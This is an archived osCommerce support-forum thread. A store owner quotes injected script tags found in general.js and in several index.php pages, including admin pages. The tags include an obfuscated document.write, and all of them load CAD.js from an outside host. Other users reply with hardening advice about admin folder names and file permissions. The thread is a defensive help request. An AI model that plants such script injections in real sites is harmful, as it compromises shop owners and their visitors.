Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

virus detected, I need advise


pablito21050

Recommended Posts

Posted

Hello, I found a virus on my OSCommerce that is still "under construction".

 

These are just some of the infected files:

includes/general.js

line 192

document.write('<s'+'cript type="text/javascript" src="http://gopakgyo.playmateswcc.com:8080/CAD.js"></scr'+'ipt>');

 

includes/languages/english/index.php

line 42

<script type="text/javascript" src="http://gopakgyo.playmateswcc.com:8080/CAD.js"></script>

<!--da6cf579973cbe80fd6e366d151e8ea0-->

 

 

admin/index.php

line 12

<script type="text/javascript" src="http://gopakgyo.playmateswcc.com:8080/CAD.js"></script>

<!--da6cf579973cbe80fd6e366d151e8ea0-->

 

my_admin_name/index.php

line 124

 

<script type="text/javascript" src="http://gopakgyo.playmateswcc.com:8080/CAD.js"></script>

<!--da6cf579973cbe80fd6e366d151e8ea0-->

 

 

I have already installed:

1.) .htaccess

2.) Sam's_anti-hacker_account_mods_V1.6

3.) PHPIDS_for_osCommerce_1_6 2

4.) Security Pro

not yet:

5.) SiteMonitor_V_2.2

6.) Pronux MySQL DB Comparer

 

I didn't get any warning message, I discover it cause a lightbox installed on the homepage didn't work..

 

We are cleaning the files but how to prevent these kinds of problem in the future?

I need suggestions, thanks.

Posted

Hello, I found a virus on my OSCommerce that is still "under construction".

 

These are just some of the infected files:

includes/general.js

line 192

document.write('<s'+'cript type="text/javascript" src="http://gopakgyo.playmateswcc.com:8080/CAD.js"></scr'+'ipt>');

 

includes/languages/english/index.php

line 42

<script type="text/javascript" src="http://gopakgyo.playmateswcc.com:8080/CAD.js"></script>

<!--da6cf579973cbe80fd6e366d151e8ea0-->

 

 

admin/index.php

line 12

<script type="text/javascript" src="http://gopakgyo.playmateswcc.com:8080/CAD.js"></script>

<!--da6cf579973cbe80fd6e366d151e8ea0-->

 

my_admin_name/index.php

line 124

 

<script type="text/javascript" src="http://gopakgyo.playmateswcc.com:8080/CAD.js"></script>

<!--da6cf579973cbe80fd6e366d151e8ea0-->

 

 

I have already installed:

1.) .htaccess

2.) Sam's_anti-hacker_account_mods_V1.6

3.) PHPIDS_for_osCommerce_1_6 2

4.) Security Pro

not yet:

5.) SiteMonitor_V_2.2

6.) Pronux MySQL DB Comparer

 

I didn't get any warning message, I discover it cause a lightbox installed on the homepage didn't work..

 

We are cleaning the files but how to prevent these kinds of problem in the future?

I need suggestions, thanks.

 

Hi,

 

Remember to change also the name of the admin( find personally the most important) you also then need to change two lines in the includes/configure.php and admin/includes/configure.php

 

Go to the thread http://www.oscommerce.com/forums/topic/313323-how-to-secure-your-site/

 

and check that you have taken all the advice if it still persists change hosting.

John

To improve is to change; to be perfect is to change often.

 

  • 2 weeks later...
Posted

Hi,

 

Remember to change also the name of the admin( find personally the most important) you also then need to change two lines in the includes/configure.php and admin/includes/configure.php

 

Go to the thread http://www.oscommerce.com/forums/topic/313323-how-to-secure-your-site/

 

and check that you have taken all the advice if it still persists change hosting.

John

 

Hi and thanks for your answer, I did it already a lot, security related, of course I changed the ADMIN name folder and I installed:

Security Pro

IP Trap

SAM Antihacker mod

PHPIDS

and .htaccess files

 

After the virus, we cleaned all files and re-installed the add ons,

I'm installing these days Site monitor and DB compare, I checked all the permissions manually, cause I didn't undestand how it works check permission contribution.

I hope that will be enough.

Posted

Hi and thanks for your answer, I did it already a lot, security related, of course I changed the ADMIN name folder and I installed:

Security Pro

IP Trap

SAM Antihacker mod

PHPIDS

and .htaccess files

 

After the virus, we cleaned all files and re-installed the add ons,

I'm installing these days Site monitor and DB compare, I checked all the permissions manually, cause I didn't undestand how it works check permission contribution.

I hope that will be enough.

 

Hi,

 

The permissions should be checked in your cpanel(or equivalent)this is your web host control panel files 644 and the yellow folders 775

 

This is not FTP as sometimes there may be problems changing the actual permissions.

John

To improve is to change; to be perfect is to change often.

 

Posted

Hi and thanks for your answer, I did it already a lot, security related, of course I changed the ADMIN name folder and I installed:

Security Pro

IP Trap

SAM Antihacker mod

PHPIDS

and .htaccess files

 

After the virus, we cleaned all files and re-installed the add ons,

I'm installing these days Site monitor and DB compare, I checked all the permissions manually, cause I didn't undestand how it works check permission contribution.

I hope that will be enough.

 

Hi,

 

The permissions should be checked in your cpanel(or equivalent)this is your web host control panel the files should be 644 and the yellow folders 775.

 

This is not FTP as sometimes there may be problems changing the actual permissions by FTP.

 

In your web hosting control panel you should be able to view all the files and folders of your domain/sites under file manager (this is not the file manager from your admin in OSC)... but from your web hosting control panel!!

Here you should be able to see/check and change all file premissions correctly.

John

To improve is to change; to be perfect is to change often.

 

Posted

Hi,

 

The permissions should be checked in your cpanel(or equivalent)this is your web host control panel the files should be 644 and the yellow folders 775.

 

This is not FTP as sometimes there may be problems changing the actual permissions by FTP.

 

In your web hosting control panel you should be able to view all the files and folders of your domain/sites under file manager (this is not the file manager from your admin in OSC)... but from your web hosting control panel!!

Here you should be able to see/check and change all file premissions correctly.

John

 

 

This is new for me, I always did by client FTP. Thanks.

Posted

This is new for me, I always did by client FTP. Thanks.

 

Hi,

sometimes depending on the you host, it is not possible to change the file premissions by FTP that is why it is better to go directly to the web host control panel you should have recieved the information on how to access the control panel when you made your hosting contract.

Here you also have the access to sql database and other useful tools check the welcome mail you received with the hosting all the details that you need should be there.

John

To improve is to change; to be perfect is to change often.

 

Posted

Hi,

sometimes depending on the you host, it is not possible to change the file premissions by FTP that is why it is better to go directly to the web host control panel you should have recieved the information on how to access the control panel when you made your hosting contract.

Here you also have the access to sql database and other useful tools check the welcome mail you received with the hosting all the details that you need should be there.

John

Yes, I received the login information three years ago when I started to work on the web, I do not understand the connection to the security problem that i had with osC..

I assure you that with a client i use, is possible to change the permissions.

Posted

Yes, I received the login information three years ago when I started to work on the web, I do not understand the connection to the security problem that i had with osC..

I assure you that with a client i use, is possible to change the permissions.

 

Hi,

do you have a cpanel/webhosting access??

To improve is to change; to be perfect is to change often.

 

Posted

The reason is as regards security, often the FTP or OSC filemanager will not change the file premission correctly and you most go directly to the web host control panel depends on the host!!

John

To improve is to change; to be perfect is to change often.

 

Posted

The reason is as regards security, often the FTP or OSC filemanager will not change the file premission correctly and you most go directly to the web host control panel depends on the host!!

John

 

Hi,

Forgot the osc/admin/admin/file_manager.php I think you have already removed sorry for the confusion.

John

To improve is to change; to be perfect is to change often.

 

Posted

Some programs sucks. It shows a virus and actually there isn't there. I used so many antiviruses and it was bad. Then i chose an old version of kaspersky

this is ok, finally:)

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...